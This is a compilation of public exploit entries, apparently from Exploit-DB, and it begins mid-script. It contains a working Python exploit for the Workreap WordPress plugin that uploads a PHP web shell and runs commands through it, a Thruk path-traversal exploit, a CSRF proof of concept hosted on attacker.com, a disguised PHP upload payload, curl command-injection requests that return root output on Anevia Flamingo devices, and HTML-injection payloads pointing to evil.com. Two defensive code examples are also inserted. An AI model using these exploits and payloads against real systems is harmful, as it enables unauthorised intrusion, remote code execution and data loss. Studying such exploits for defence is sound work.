example for linux : python3 Workreap_rce.py https://www.exploit-db.com
example for Windows : python Workreap_rce.py https://www.exploit-db.com
'''
    print(f"{BOLD}{banner}{ENDC}")


def upload_file(target):
    print("[ ] Uploading File")
    url = target + "/wp-admin/admin-ajax.php"
    body = "<?php echo '" + random_str + "';?>"
    data = {"action": "workreap_award_temp_file_uploader"}
    response = requests.post(url, data=data, files={"award_img": (file_name, body)})
    if '{"type":"success",' in response.text:
        print(f"{GREEN}[+] File uploaded successfully{ENDC}")
        check_php_file(target)
    else:
        print(f"{RED}[+] File was not uploaded{ENDC}")


def check_php_file(target):
    response_2 = requests.get(target + "/wp-content/uploads/workreap-temp/" + file_name)
    if random_str in response_2.text:
        print(f"{GREEN}The uploaded PHP file executed successfully.{ENDC}")
        print("path: " + target + "/wp-content/uploads/workreap-temp/" + file_name)
        question = input(f"{YELLOW}Do you want get RCE? [Y/n] {ENDC}")
        if question == "y" or question == "Y":
            print("[ ] Uploading Shell ")
            get_rce(target)
        else:
            usage()
    else:
        print(f"{RED}[+] PHP file not allowed on this website. Try uploading another file.{ENDC}")


def get_rce(target):
    file_name = ''.join(random.choices(string.ascii_lowercase + string.digits, k=8)) + ".php"
    body = '<?php $command = $_GET["c"]; $output = shell_exec($command); echo "<pre>\n$output</pre>";?>'
    data = {"action": "workreap_award_temp_file_uploader"}
    response_3 = requests.post(target + '/wp-admin/admin-ajax.php', data=data, files={"award_img": (file_name, body)})
    print(f"{GREEN}[+] Shell uploaded successfully{ENDC}")
    while True:
        command = input(f"{YELLOW}Enter a command to execute: {ENDC}")
        print(f"Shell Path : {target}'/wp-content/uploads/workreap-temp/{BOLD}{file_name}?c={command}{ENDC}")
        response_4 = requests.get(target + '/wp-content/uploads/workreap-temp/' + file_name + f"?c={command}")
        print(f"{GREEN}{response_4.text}{ENDC}")


if __name__ == "__main__":
    global GREEN, RED, YELLOW, BOLD, ENDC
    GREEN = '\033[92m'
    RED = '\033[91m'
    YELLOW = '\033[93m'
    BOLD = '\033[1m'
    ENDC = '\033[0m'
    file_name = ''.join(random.choices(string.ascii_lowercase + string.digits, k=8)) + ".php"
    random_str = ''.join(random.choices(string.ascii_lowercase + string.digits, k=8))
    try:
        upload_file(sys.argv[1])
    except IndexError:
        usage()
    except requests.exceptions.RequestException as e:
        print("\nPlease Enter Valid Address")
-
Thruk Monitoring Web Interface 3.06 - Path Traversal
# Exploit Title: Thruk Monitoring Web Interface 3.06 - Path Traversal
# Date: 08-Jun-2023
# Exploit Author: Galoget Latorre (@galoget)
# CVE: CVE-2023-34096 (Galoget Latorre)
# Vendor Homepage: https://thruk.org/
# Software Link: https://github.com/sni/Thruk/archive/refs/tags/v3.06.zip
# Software Link + Exploit + PoC (Backup): https://github.com/galoget/Thruk-CVE-2023-34096
# CVE Author Blog: https://galogetlatorre.blogspot.com/2023/06/cve-2023-34096-path-traversal-thruk.html
# GitHub Security Advisory: https://github.com/sni/Thruk/security/advisories/GHSA-vhqc-649h-994h
# Affected Versions: <= 3.06
# Language: Python 3.x
# Tested on:
# - Ubuntu 22.04.5 LTS 64-bit
# - Debian GNU/Linux 10 (buster) 64-bit
# - Kali GNU/Linux 2023.1 64-bit
# - CentOS GNU/Linux 8.5.2111 64-bit

#!/usr/bin/python3
# -*- coding:utf-8 -*-

import sys
import warnings
import requests
from bs4 import BeautifulSoup
from termcolor import cprint

# Usage: python3 exploit.py <target.site>
# Example: python3 exploit.py http://127.0.0.1/thruk/

# Disable warnings
warnings.filterwarnings('ignore')

# Set headers
headers = {
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36"
}


def banner():
    """
    Function to print the banner
    """
    banner_text = """
 __ __ __ __ __ __ __ __ __ __
/ \\ /|_ __ _) / \\ _) _) __ _) |__| / \\
(__\\ /__ \\__ \\/ |__ /__ \\__/ /__ __) __) | \\__/ __/ \\__)

    Path Traversal Vulnerability in Thruk Monitoring Web Interface ≤ 3.06

    Exploit & CVE Author: Galoget Latorre (@galoget)
    LinkedIn: https://www.linkedin.com/in/galoget
    """
    print(banner_text)


def usage_instructions():
    """
    Function that validates the number of arguments.
    The application MUST have 2 arguments:
    - [0]: Name of the script
    - [1]: Target URL (Thruk Base URL)
    """
    if len(sys.argv) != 2:
        print("Usage: python3 exploit.py <target.site>")
        print("Example: python3 exploit.py http://127.0.0.1/thruk/")
        sys.exit(0)


def check_vulnerability(thruk_version):
    """
    Function to check if the recovered version is vulnerable to CVE-2023-34096.
    Prints additional information about the vulnerability.
    """
    try:
        if float(thruk_version[1:5]) <= 3.06:
            if float(thruk_version[4:].replace("-", ".")) < 6.2:
                cprint("[+] ", "green", attrs=['bold'], end = "")
                print("This version of Thruk is ", end = "")
                cprint("VULNERABLE ", "red", attrs=['bold'], end = "")
                print("to CVE-2023-34096!")
                print(" | CVE Author Blog: https://galogetlatorre.blogspot.com/2023/06/cve-2023-34096-path-traversal-thruk.html")
                print(" | GitHub Security Advisory: https://github.com/sni/Thruk/security/advisories/GHSA-vhqc-649h-994h")
                print(" | CVE MITRE: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-34096")
                print(" | CVE NVD NIST: https://nvd.nist.gov/vuln/detail/CVE-2023-34096")
                print(" | Thruk Changelog: https://www.thruk.org/changelog.html")
                print(" | Fixed version: 3.06-2+")
                print("")
                return True
            else:
                cprint("[-] ", "red", attrs=['bold'], end = "")
                print("It looks like this version of Thruk is NOT VULNERABLE to CVE-2023-34096.")
                return False
    except:
        cprint("[-] ", "red", attrs=['bold'], end = "")
        print("There was an error parsing Thruk's version.\n")
        return False


def get_thruk_version():
    """
    Function to get Thruk's version via web scraping.
    It also verifies the title of the website to check if the target is a Thruk instance.
    """
    response = requests.get(target, headers=headers, allow_redirects=True, verify=False, timeout=10)
    html_soup = BeautifulSoup(response.text, "html.parser")

    if "<title>Thruk Monitoring Webinterface</title>" not in response.text:
        cprint("[-] ", "red", attrs=['bold'], end = "")
        print("Verify if the URL is correct and points to a Thruk Monitoring Web Interface.")
        sys.exit(-1)
    else:
        # Extract version anchor tag
        version_link = html_soup.find_all("a", {"class": "link text-sm"})

        if len(version_link) == 1 and version_link[0].has_attr('href'):
            thruk_version = version_link[0].text.strip()
            cprint("[+] ", "green", attrs=['bold'], end = "")
            print(f"Detected Thruk Version (Public Banner): {thruk_version}\n")
            return thruk_version
        else:
            cprint("[-] ", "red", attrs=['bold'], end = "")
            print("There was an error retrieving Thruk's version.")
            sys.exit(-1)


def get_error_info():
    """
    Function to cause an error in the target Thruk instance and
    collect additional information via web scraping.
    """
    # URL that will cause an error
    error_url = target + "//cgi-bin/login.cgi"

    # Retrieve Any initial Cookies
    error_response = requests.get(error_url, headers=headers, allow_redirects=False, verify=False, timeout=10)

    cprint("[*] ", "blue", attrs=['bold'], end = "")
    print("Trying to retrieve additional information...\n")

    try:
        # Search for the error tag
        html_soup = BeautifulSoup(error_response.text, "html.parser")
        error_report = html_soup.find_all("pre", {"class": "text-left mt-5"})[0].text

        if len(error_report) > 0:
            # Print Error Info
            error_report = error_report[error_report.find("Version"):error_report.find("\n\nStack")]
            cprint("[+] ", "green", attrs=['bold'], end = "")
            print("Recovered Information: \n")
            parsed_error_report = error_report.split("\n")
            for error_line in parsed_error_report:
                print(f"    {error_line}")
    except:
        cprint("[-] ", "red", attrs=['bold'], end = "")
        print("No additional information available.\n")


def get_thruk_session_auto_login():
    """
    Function to login into the Thruk instance and retrieve a valid session.
    It will use default Thruk's credentials available here:
    - https://www.thruk.org/documentation/install.html
    Change credentials if required.
    """
    # Default Credentials - Change if required
    username = "thrukadmin"  # CHANGE ME
    password = "thrukadmin"  # CHANGE ME
    params = {"login": username, "password": password}

    cprint("[*] ", "blue", attrs=['bold'], end = "")
    print(f"Trying to authenticate with provided credentials: {username}/{password}\n")

    # Define Login URL
    login_url = "cgi-bin/login.cgi"

    session = requests.Session()

    # Retrieve Any initial Cookies
    session.get(target, headers=headers, allow_redirects=True, verify=False)

    # Login and get thruk_auth Cookie
    session.post(target + login_url, data=params, headers=headers, allow_redirects=False, verify=False)

    # Get Cookies as dictionary
    cookies = session.cookies.get_dict()

    # Successful Login
    if cookies.get('thruk_auth') is not None:
        cprint("[+] ", "green", attrs=['bold'], end = "")
        print("Successful Authentication!\n")
        cprint("[+] ", "green", attrs=['bold'], end = "")
        print(f"Login Cookie: thruk_auth={cookies.get('thruk_auth')}\n")
        return session
    # Failed Login
    else:
        if cookies.get('thruk_message') == "fail_message~~login%20failed":
            cprint("[-] ", "red", attrs=['bold'], end = "")
            print("Login Failed, check your credentials.")
            sys.exit(401)


def cve_2023_34096_exploit_path_traversal(logged_session):
    """
    Function that attempts to exploit the Path Traversal Vulnerability.
    The exploit will try to upload a PoC file to multiple common folders.
    This to prevent permissions errors to cause false negatives.
    """
    cprint("[*] ", "blue", attrs=['bold'], end = "")
    print("Trying to exploit: ", end = "")
    cprint("CVE-2023-34096 - Path Traversal\n", "yellow", attrs=['bold'])

    # Define Upload URL
    upload_url = "cgi-bin/panorama.cgi"

    # Absolute paths
    common_folders = ["/tmp/",
                      "/etc/thruk/plugins/plugins-enabled/",
                      "/etc/thruk/panorama/",
                      "/etc/thruk/bp/",
                      "/etc/thruk/thruk_local.d/",
                      "/var/www/",
                      "/var/www/html/",
                      "/etc/",
                      ]

    # Upload PoC file to each folder
    for target_folder in common_folders:
        # PoC file extension is jpg due to regex validations of Thruk.
        # Nevertheless this issue can still cause damage in different ways to the affected instance.
        files = {'image': ("exploit.jpg", "CVE-2023-34096-Exploit-PoC-by-galoget")}
        data = {"task": "upload",
                "type": "image",
                "location": f"backgrounds/../../../..{target_folder}"
                }

        upload_response = logged_session.post(target + upload_url, data=data, files=files, headers=headers, allow_redirects=False, verify=False)

        try:
            upload_response = upload_response.json()

            if upload_response.get("msg") == "Upload successfull" and upload_response.get("success") is True:
                cprint("[+] ", "green", attrs=['bold'], end = "")
                print(f"File successfully uploaded to folder: {target_folder}{files.get('image')[0]}\n")
            elif upload_response.get("msg") == "Fileupload must use existing and writable folder.":
                cprint("[-] ", "red", attrs=['bold'], end = "")
                print(f"File upload to folder \'{target_folder}{files.get('image')[0]}\' failed due to write permissions or non-existent folder!\n")
            else:
                cprint("[-] ", "red", attrs=['bold'], end = "")
                print("File upload failed.\n")
        except:
            cprint("[-] ", "red", attrs=['bold'], end = "")
            print("File upload failed.\n")


if __name__ == "__main__":
    banner()
    usage_instructions()

    # Change this with the domain or IP address to attack
    if sys.argv[1] and sys.argv[1].startswith("http"):
        target = sys.argv[1]
    else:
        target = "http://127.0.0.1/thruk/"

    # Prepare Base Target URL
    if not target.endswith('/'):
        target += "/"

    cprint("[+] ", "green", attrs=['bold'], end = "")
    print(f"Target URL: {target}\n")

    # Get Thruk version via web scraping
    scraped_thruk_version = get_thruk_version()

    # Send a request that will generate an error and collect extra info
    get_error_info()

    # Check if the instance is vulnerable to CVE-2023-34096
    vulnerable_status = check_vulnerability(scraped_thruk_version)

    if vulnerable_status:
        cprint("[+] ", "green", attrs=['bold'], end = "")
        print("The Thruk version found in this host is vulnerable to CVE-2023-34096. Do you want to try to exploit it?")

        # Confirm exploitation
        option = input("\nChoice (Y/N): ").lower()
        print("")

        if option == "y":
            cprint("[*] ", "blue", attrs=['bold'], end = "")
            print("The tool will attempt to exploit the vulnerability by uploading a PoC file to common folders...\n")

            # Login into Thruk instance
            valid_session = get_thruk_session_auto_login()

            # Exploit Path Traversal Vulnerability
            cve_2023_34096_exploit_path_traversal(valid_session)
        elif option == "n":
            cprint("[*] ", "blue", attrs=['bold'], end = "")
            print("No exploitation attempts were performed, Goodbye!\n")
            sys.exit(0)
        else:
            cprint("[-] ", "red", attrs=['bold'], end = "")
            print("Unknown option entered.")
            sys.exit(1)
    else:
        cprint("[-] ", "red", attrs=['bold'], end = "")
        print("The current Thruk's version is NOT VULNERABLE to CVE-2023-34096.")
        sys.exit(2)
-
Online Examination System Project 1.0 - Cross-site request forgery (CSRF)
# Exploit Title: Online Examination System Project 1.0 - Cross-site request forgery (CSRF)
# Google Dork: n/a
# Date: 09/06/2023
# Exploit Author: Ramil Mustafayev (kryptohaker)
# Vendor Homepage: https://github.com/projectworldsofficial/online-examination-systen-in-php
# Software Link: https://github.com/projectworlds32/online-examination-systen-in-php/archive/master.zip
# Version: 1.0
# Tested on: Windows 10, XAMPP for Windows 8.0.28 / PHP 8.0.28
# CVE : n/a

Online Examination System Project <=1.0 versions (PHP/MYSQL) are vulnerable to Cross-Site Request Forgery (CSRF) attacks. An attacker can craft a malicious link that, when clicked by an admin user, will delete a user account from the database without the admin’s consent. This is possible because the application uses GET requests to perform account deletion and does not implement any CSRF protection mechanism. The email of the user to be deleted is passed as a parameter in the URL, which can be manipulated by the attacker. This could result in loss of data.

To exploit this vulnerability, an attacker needs to do the following:

1. Identify the URL of the target application where Online Examination System Project is installed. For example, http://example.com/
2. Identify the email address of a user account that the attacker wants to delete. For example, victim@example.com
3. Create an HTML page that contains a hidden form with the target URL and the user email as parameters. For example:

   <html>
     <body>
       <form action="http://example.com/update.php" method="GET">
         <input type="hidden" name="demail" value="victim@example.com" />
       </form>
       <script>
         document.forms[0].submit();
       </script>
     </body>
   </html>

4. Host the HTML page on a server that is accessible by the admin user of the target application. For example, http://attacker.com/poc.html
5. Send the URL of the HTML page to the admin user via email, social media, or any other means.

If the admin user visits the URL of the HTML page, the script will submit the form and delete the user account associated with the email address from the database without the admin’s consent or knowledge.
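The advisory names the two missing controls: the deletion is reachable via GET, and nothing ties the request to the admin's session. Below is an added example, not the Online Examination System's code, of how such a delete-user action can be protected; the request and session are plain dicts standing in for a framework's objects, and the handler name, field names and site origin are assumptions.

```python
# Added defensive example (not the Online Examination System's code).
# request = {"method": ..., "form": {...}, "headers": {...}}; session is a dict
# the server keeps per logged-in admin; users maps e-mail -> record.
import hmac
import secrets


def issue_csrf_token(session):
    """Mint a random per-session token; the delete form embeds it as a hidden field."""
    token = secrets.token_hex(32)
    session["csrf_token"] = token
    return token


def csrf_token_valid(session, submitted):
    """Constant-time comparison of the submitted token with the stored one."""
    expected = session.get("csrf_token")
    if not expected or not isinstance(submitted, str) or not submitted:
        return False
    return hmac.compare_digest(expected.encode(), submitted.encode())


def same_origin(request, site_origin):
    """Second layer: the browser-set Origin (or, failing that, Referer) must be ours."""
    headers = request.get("headers", {})
    origin = headers.get("Origin")
    if origin is not None:
        return origin == site_origin
    return headers.get("Referer", "").startswith(site_origin + "/")


def handle_delete_user(request, session, users, site_origin="http://example.com"):
    """Return (status, message); deletes users[email] only when every check passes."""
    # 1. A state change must not be reachable through GET: the PoC above works
    #    precisely because an auto-submitted GET form (or a bare link) is enough.
    if request["method"] != "POST":
        return 405, "use POST for state-changing actions"
    if not session.get("is_admin"):
        return 403, "admin only"
    # 2. A cross-site page cannot read the admin's session token, so it cannot
    #    supply it; a SameSite cookie attribute would add a third layer.
    form = request.get("form", {})
    if not csrf_token_valid(session, form.get("csrf_token")):
        return 403, "missing or invalid CSRF token"
    if not same_origin(request, site_origin):
        return 403, "cross-origin request refused"
    email = form.get("demail", "")
    if email not in users:
        return 404, "no such user"
    del users[email]
    return 200, "deleted " + email
```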
-
Teachers Record Management System 1.0 - File Upload Type Validation
Exploit Title: Teachers Record Management System 1.0 – File Upload Type Validation
Date: 17-01-2023
EXPLOIT-AUTHOR: AFFAN AHMED
Vendor Homepage: https://phpgurukul.com
Software Link: https://phpgurukul.com/teachers-record-management-system-using-php-and-mysql/
Version: 1.0
Tested on: Windows 11 + XAMPP
CVE : CVE-2023-3187

===============================
STEPS_TO_REPRODUCE
===============================

1. Login into the Teacher account with the credentials “Username: jogoe12@yourdomain.com”, “Password: Test@123”
2. Navigate to the Profile section and edit the profile picture by clicking on Edit Image
3. Open Burp Suite and intercept the Edit Image request
4. In the POST request change the “Filename” from “profile picture.png” to “profile picture.php.gif”
5. Change the Content-Type from “image/png” to “image/gif”
6. And add this payload: `GIF89a <?php echo system($_REQUEST['dx']); ?>`
7. GIF89a is the GIF magic-byte signature; this bypasses the file upload extension check
8. Below is the Burp Suite POST request with all the changes that I have made above

==========================================
BURPSUITE_REQUEST
==========================================

POST /trms/teacher/changeimage.php HTTP/1.1
Host: localhost
Content-Length: 442
Cache-Control: max-age=0
sec-ch-ua: "Chromium";v="109", "Not_A Brand";v="99"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryndAPYa0GGOxSUHdF
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.75 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/trms/teacher/changeimage.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=8alf0rbfjmhm3ddra7si0cv7qc
Connection: close

------WebKitFormBoundaryndAPYa0GGOxSUHdF
Content-Disposition: form-data; name="subjects"

John Doe
------WebKitFormBoundaryndAPYa0GGOxSUHdF
Content-Disposition: form-data; name="newpic"; filename="profile picture.php.gif"
Content-Type: image/gif

GIF89a <?php echo system($_REQUEST['dx']); ?>
------WebKitFormBoundaryndAPYa0GGOxSUHdF
Content-Disposition: form-data; name="submit"


------WebKitFormBoundaryndAPYa0GGOxSUHdF--

===============================
PROOF_OF_CONCEPT
===============================
GITHUB_LINK: https://github.com/ctflearner/Vulnerability/blob/main/Teacher_Record_Management_System/trms.md
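The request above passes because the server trusts the client's declared Content-Type and the leading GIF89a bytes, and keeps the client-chosen multi-extension filename. The following is an added defensive example, not the Teachers Record Management System's code, of an upload validator that refuses each of those three things; the function names, size limit and allow-list are assumptions.

```python
# Added defensive example (not the Teachers Record Management System's code).
# The allow-list, the size limit and the function names are assumptions.
import secrets
import struct

# Allowed extension -> the MIME type the browser must declare for it.
ALLOWED = {"png": "image/png", "jpg": "image/jpeg", "jpeg": "image/jpeg", "gif": "image/gif"}
# Detected container format -> MIME type, used to cross-check the extension.
FORMAT_MIME = {"png": "image/png", "jpeg": "image/jpeg", "gif": "image/gif"}


def split_extension(filename):
    """Return (stem, ext); accept only name.ext with exactly one dot, so a
    multi-extension name such as 'profile picture.php.gif' never reaches disk
    (Apache-style multi-extension handling may otherwise run it as PHP)."""
    base = filename.replace("\\", "/").rsplit("/", 1)[-1]
    parts = base.split(".")
    if len(parts) != 2 or not parts[0] or not parts[1]:
        raise ValueError("filename must be name.ext with a single extension")
    return parts[0], parts[1].lower()


def detect_image_format(data):
    """Structural sniff of the whole container, not just the magic bytes: the PoC
    above starts with GIF89a but has neither a logical screen descriptor nor the
    0x3B trailer. Returns 'gif', 'png', 'jpeg' or None."""
    if data[:6] in (b"GIF87a", b"GIF89a"):
        if len(data) < 14:
            return None
        width, height = struct.unpack("<HH", data[6:10])
        return "gif" if width and height and data[-1:] == b"\x3b" else None
    if data[:8] == b"\x89PNG\r\n\x1a\n":
        # A complete PNG ends with the zero-length IEND chunk and its fixed CRC.
        return "png" if data[-12:] == b"\x00\x00\x00\x00IEND\xaeB`\x82" else None
    if data[:3] == b"\xff\xd8\xff":
        return "jpeg" if data[-2:] == b"\xff\xd9" else None
    return None


def validate_image_upload(filename, content_type, data, max_bytes=2 * 1024 * 1024):
    """Return (detected_format, stored_name) or raise ValueError.

    The stored name is random and server-chosen, so the client never controls
    what ends up on disk. Serve the upload directory with script execution
    disabled and, ideally, re-encode the image so embedded text is discarded;
    the structural sniff is a sanity check, not proof of a benign file.
    """
    if len(data) > max_bytes:
        raise ValueError("file too large")
    _stem, ext = split_extension(filename)
    if ext not in ALLOWED:
        raise ValueError("extension not allowed: " + ext)
    if content_type != ALLOWED[ext]:
        raise ValueError("declared Content-Type does not match extension")
    fmt = detect_image_format(data)
    if fmt is None or FORMAT_MIME[fmt] != ALLOWED[ext]:
        raise ValueError("content is not a well-formed %s image" % ext)
    return fmt, secrets.token_hex(16) + "." + ext
```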
-
Anevia Flamingo XL 3.6.20 - Authenticated Root Remote Code Execution
Exploit Title: Anevia Flamingo XL 3.6.20 - Authenticated Root Remote Code Execution
Exploit Author: LiquidWorm
Vendor: Ateme
Product web page: https://www.ateme.com
Affected version: 3.6.20, 3.2.9
                  Hardware revision 1.1, 1.0
                  SoapLive 2.4.1, 2.0.3
                  SoapSystem 1.3.1

Summary: Flamingo XL, a new modular and high-density IPTV head-end product for hospitality and corporate markets. Flamingo XL captures live TV and radio content from satellite, cable, digital terrestrial and analog sources before streaming it over IP networks to STBs, PCs or other IP-connected devices. The Flamingo XL is based upon a modular 4U rack hardware platform that allows hospitality and corporate video service providers to deliver a mix of channels from various sources over internal IP networks.

Desc: The affected device suffers from an authenticated remote code execution vulnerability. A remote attacker can exploit this issue and execute arbitrary system commands, granting her system access with root privileges.

Tested on: GNU/Linux 3.1.4 (x86_64)
           Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8g DAV/2 PHP/5.3.6

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience

Advisory ID: ZSL-2023-5779
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5779.php

13.04.2023

--

> curl -vL http://192.168.1.1/admin/time.php -H "Cookie: PHPSESSID=i3nu7de9vv0q9pi4a8eg8v71b4" -d "ntp=`id`&request=ntp&update=Sync" |findstr root
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
  0     0    0     0    0     0      0      0 --:--:-- --:--:-- --:--:--     0*   Trying 192.168.1.1:80...
* Connected to 192.168.1.1 (192.168.1.1) port 80 (#0)
> POST /admin/time.php HTTP/1.1
> Host: 192.168.1.1
> User-Agent: curl/8.0.1
> Accept: */*
> Cookie: PHPSESSID=i3nu7de9vv0q9pi4a8eg8v71b4
> Content-Length: 32
> Content-Type: application/x-www-form-urlencoded
>
} [32 bytes data]
100    32    0     0  100    32      0     25  0:00:01  0:00:01 --:--:--    25< HTTP/1.1 302 Found
< Date: Thu, 13 Apr 2023 23:54:15 GMT
< Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8g DAV/2 PHP/5.3.6
< X-Powered-By: PHP/5.3.6
< Expires: Thu, 19 Nov 1981 08:52:00 GMT
< Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
< Pragma: no-cache
* Please rewind output before next send
< Location: /admin/time.php
< Transfer-Encoding: chunked
< Content-Type: text/html
<
* Ignoring the response-body
{ [5 bytes data]
100    32    0     0  100    32      0     19  0:00:01  0:00:01 --:--:--    19
* Connection #0 to host 192.168.1.1 left intact
* Issue another request to this URL: 'http://192.168.1.1/admin/time.php'
* Switch from POST to GET
* Found bundle for host: 0x1de6c6321b0 [serially]
* Re-using existing connection #0 with host 192.168.1.1
> POST /admin/time.php HTTP/1.1
> Host: 192.168.1.1
> User-Agent: curl/8.0.1
> Accept: */*
> Cookie: PHPSESSID=i3nu7de9vv0q9pi4a8eg8v71b4
>
< HTTP/1.1 200 OK
< Date: Thu, 13 Apr 2023 23:54:17 GMT
< Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8g DAV/2 PHP/5.3.6
< X-Powered-By: PHP/5.3.6
< Expires: Thu, 19 Nov 1981 08:52:00 GMT
< Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
< Pragma: no-cache
< Transfer-Encoding: chunked
< Content-Type: text/html
<
{ [13853 bytes data]
14 Apr 03:54:17 ntpdate[8964]: can't find host uid=0(root)<br />   <----------------------<<
14 Apr 03:54:17 ntpdate[8964]: can't find host gid=0(root)<br />   <----------------------<<
100 33896    0 33896    0     0  14891      0 --:--:--  0:00:02 --:--:--   99k
* Connection #0 to host 192.168.1.1 left intact
-
Anevia Flamingo XS 3.6.5 - Authenticated Root Remote Code Execution
Exploit Title: Anevia Flamingo XS 3.6.5 - Authenticated Root Remote Code Execution
Exploit Author: LiquidWorm
Vendor: Ateme
Product web page: https://www.ateme.com
Affected version: 3.6.5
                  Hardware revision: 1.1
                  SoapLive 2.4.0
                  SoapSystem 1.3.1

Summary: Flamingo XL, a new modular and high-density IPTV head-end product for hospitality and corporate markets. Flamingo XL captures live TV and radio content from satellite, cable, digital terrestrial and analog sources before streaming it over IP networks to STBs, PCs or other IP-connected devices. The Flamingo XL is based upon a modular 4U rack hardware platform that allows hospitality and corporate video service providers to deliver a mix of channels from various sources over internal IP networks.

Desc: The affected device suffers from an authenticated remote code execution vulnerability. A remote attacker can exploit this issue and execute arbitrary system commands, granting her system access with root privileges.

Tested on: GNU/Linux 3.14.29 (x86_64)
           Apache/2.2.22 (Debian)
           PHP/5.6.0-0anevia2

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience

Advisory ID: ZSL-2023-5778
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5778.php

13.04.2023

--

$ curl -sL "http://192.168.1.1/admin/time.php" -H "Cookie: PHPSESSID=o4pan20dtnfb239trffu06pid4" -d "ntp_hosts%5B%5D=&ntp_hosts%5B%5D=%60id%60&ntp_address=&update=Apply&request=ntp" |findstr www-data
                    <td>uid=33(www-data)</td>
                    <input type="hidden" name="ntp_hosts[]" value="uid=33(www-data)"/>
                    <td>gid=33(www-data)</td>
                    <input type="hidden" name="ntp_hosts[]" value="gid=33(www-data)"/>
                    <td>groups=33(www-data),6(disk),25(floppy)</td>
                    <input type="hidden" name="ntp_hosts[]" value="groups=33(www-data),6(disk),25(floppy)"/>

---

$ curl -sL "http://192.168.1.1/admin/time.php" -H "Cookie: PHPSESSID=o4pan20dtnfb239trffu06pid4" -d "ntp_hosts%5B%5D=&ntp_hosts%5B%5D=%60sudo%20id%60&ntp_address=&update=Apply&request=ntp" |findstr root
                    <td>uid=0(root)</td>
                    <input type="hidden" name="ntp_hosts[]" value="uid=0(root)"/>
                    <td>gid=0(root)</td>
                    <input type="hidden" name="ntp_hosts[]" value="gid=0(root)"/>
                    <td>groups=0(root)</td>
                    <input type="hidden" name="ntp_hosts[]" value="groups=0(root)"/>
-
Sales Tracker Management System v1.0 - Multiple Vulnerabilities
Exploit Title: Sales Tracker Management System v1.0 – Multiple Vulnerabilities
Google Dork: NA
Date: 09-06-2023
EXPLOIT-AUTHOR: AFFAN AHMED
Vendor Homepage: https://www.sourcecodester.com/
Software Link: https://www.sourcecodester.com/download-code?nid=16061&title=Sales+Tracker+Management+System+using+PHP+Free+Source+Code
Version: 1.0
Tested on: Windows 11 + XAMPP
CVE : CVE-2023-3184

==============================
CREDENTIAL TO USE
==============================
ADMIN-ACCOUNT
USERNAME: admin
PASSWORD: admin123

=============================
PAYLOAD_USED
=============================
1. <a href=//evil.com>CLICK_HERE_FOR_FIRSTNAME</a>
2. <a href=//evil.com>CLICK_HERE_FOR_MIDDLENAME</a>
3. <a href=//evil.com>CLICK_HERE_FOR_LASTNAME</a>
4. <a href=//evil.com>CLICK_HERE_FOR_USERNAME</a>

===============================
STEPS_TO_REPRODUCE
===============================
1. FIRST LOGIN INTO YOUR ACCOUNT BY USING THE GIVEN CREDENTIALS OF ADMIN
2. THEN NAVIGATE TO USER_LIST AND CLICK ON THE `CREATE NEW` BUTTON OR VISIT THIS URL: `http://localhost/php-sts/admin/?page=user/manage_user`
3. THEN FILL UP THE DETAILS AND PUT THE ABOVE PAYLOAD IN `firstname`, `middlename`, `lastname` AND IN `username`
4. AFTER ENTERING THE PAYLOAD CLICK ON THE SAVE BUTTON
5. AFTER SAVING THE FORM YOU WILL BE REDIRECTED TO THE ADMIN SITE WHERE YOU CAN SEE THAT THE NEW USER IS ADDED.
6. AFTER CLICKING ON EACH PAYLOAD IT REDIRECTS ME TO THE EVIL SITE

==========================================
BURPSUITE_REQUEST
==========================================
POST /php-sts/classes/Users.php?f=save HTTP/1.1
Host: localhost
Content-Length: 1037
sec-ch-ua:
Accept: */*
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary7hwjNQW3mptDFOwo
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.110 Safari/537.36
sec-ch-ua-platform: ""
Origin: http://localhost
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost/php-sts/admin/?page=user/manage_user
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=r0ejggs25qnlkf9funj44b1pbn
Connection: close

------WebKitFormBoundary7hwjNQW3mptDFOwo
Content-Disposition: form-data; name="id"


------WebKitFormBoundary7hwjNQW3mptDFOwo
Content-Disposition: form-data; name="firstname"

<a href=//evil.com>CLICK_HERE_FOR_FIRSTNAME</a>
------WebKitFormBoundary7hwjNQW3mptDFOwo
Content-Disposition: form-data; name="middlename"

<a href=//evil.com>CLICK_HERE_FOR_MIDDLENAME</a>
------WebKitFormBoundary7hwjNQW3mptDFOwo
Content-Disposition: form-data; name="lastname"

<a href=//evil.com>CLICK_HERE_FOR_LASTNAME</a>
------WebKitFormBoundary7hwjNQW3mptDFOwo
Content-Disposition: form-data; name="username"

<a href=//evil.com>CLICK_HERE_FOR_USERNAME</a>
